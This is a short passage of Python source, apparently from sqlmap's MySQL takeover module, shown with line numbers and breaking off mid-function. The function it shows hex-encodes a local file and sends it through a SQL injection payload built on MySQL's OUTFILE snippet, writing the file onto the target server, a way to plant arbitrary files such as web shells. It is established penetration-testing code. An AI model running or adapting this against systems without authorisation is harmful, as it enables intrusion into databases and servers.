(self, localFile, remoteFile, fileType, forceCheck=False)
| 118 | return self.askCheckWrittenFile(localFile, remoteFile, forceCheck) |
| 119 | |
| 120 | def linesTerminatedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): |
| 121 | logger.debug("encoding file to its hexadecimal string value") |
| 122 | |
| 123 | fcEncodedList = self.fileEncode(localFile, "hex", True) |
| 124 | fcEncodedStr = fcEncodedList[0][2:] |
| 125 | fcEncodedStrLen = len(fcEncodedStr) |
| 126 | |
| 127 | if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000: |
| 128 | warnMsg = "the injection is on a GET parameter and the file " |
| 129 | warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen |
| 130 | warnMsg += "bytes, this might cause errors in the file " |
| 131 | warnMsg += "writing process" |
| 132 | logger.warning(warnMsg) |
| 133 | |
| 134 | debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile) |
| 135 | logger.debug(debugMsg) |
| 136 | |
| 137 | query = getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=remoteFile, HEXSTRING=fcEncodedStr) |
| 138 | query = agent.prefixQuery(query) # Note: No need for suffix as 'write_file_limit' already ends with comment (required) |
| 139 | payload = agent.payload(newValue=query) |
| 140 | Request.queryPage(payload, content=False, raise404=False, silent=True, noteResponseTime=False) |
| 141 | |
| 142 | warnMsg = "expect junk characters inside the " |
| 143 | warnMsg += "file as a leftover from original query" |
| 144 | singleTimeWarnMessage(warnMsg) |
| 145 | |
| 146 | return self.askCheckWrittenFile(localFile, remoteFile, forceCheck) |
| 147 | |
| 148 | def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): |
| 149 | debugMsg = "creating a support table to write the hexadecimal " |
no test coverage detected